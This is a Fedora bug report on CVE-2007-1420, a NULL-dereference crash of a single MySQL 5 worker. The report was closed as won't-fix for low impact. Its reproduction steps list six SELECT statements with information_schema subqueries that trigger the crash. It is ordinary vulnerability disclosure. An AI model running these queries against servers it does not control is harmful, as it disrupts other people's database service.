Bug 232604 - CVE-2007-1420 Single MySQL worker can be crashed (NULL deref) with certain SELECT statements
Keywords:
Status: CLOSED WONTFIX
Alias: None
Product: Fedora
Classification: Fedora
Component: mysql
Version: 5
Hardware: All
OS: Linux
Priority: low
Severity: low
Target Milestone: ---
Assignee: Tom Lane
QA Contact: David Lawrence
URL: http://www.securityfocus.com/bid/2290...
Whiteboard: impact=low,source=gentoo,reported=200...
Depends On:
Blocks:
Reported: 2007-03-16 12:19 UTC by Lubomir Kundrak
Modified: 2013-07-03 03:12 UTC (History)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2007-08-02 12:25:15 UTC



Description Lubomir Kundrak 2007-03-16 12:19:13 UTC
+++ This bug was initially created as a clone of Bug #232603 +++

Description of problem:

A NULL pointer dereference occurs after issuing the SELECT statements
below. Security impact is very limited, as only one worker crashes, leaving
the server running and ready for service. Additionally, an attacker must be
authenticated and permitted to execute arbitrary SELECT statements.

Version-Release number of selected component (if applicable):

Does not affect MySQL 4.

How reproducible:

Always, by an authenticated user.

Steps to Reproduce:

SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT TRIM(LEADING FROM (SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY 1),1,1);
SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY 1),1,'lol');

Actual results:

The session closes prematurely, fault message in the log file.

Expected results:

I expected it to crash. I like this section of a bug report.

Comment 1 Lubomir Kundrak 2007-03-16 12:20:31 UTC
Both FC5 and FC6.

Comment 2 Lubomir Kundrak 2007-08-02 12:25:15 UTC
Closing this -- FC5 is EOL, and anyway, there's no point in spending
time on fixing this, as it poses no real threat and is triggerable only by
an authenticated user.

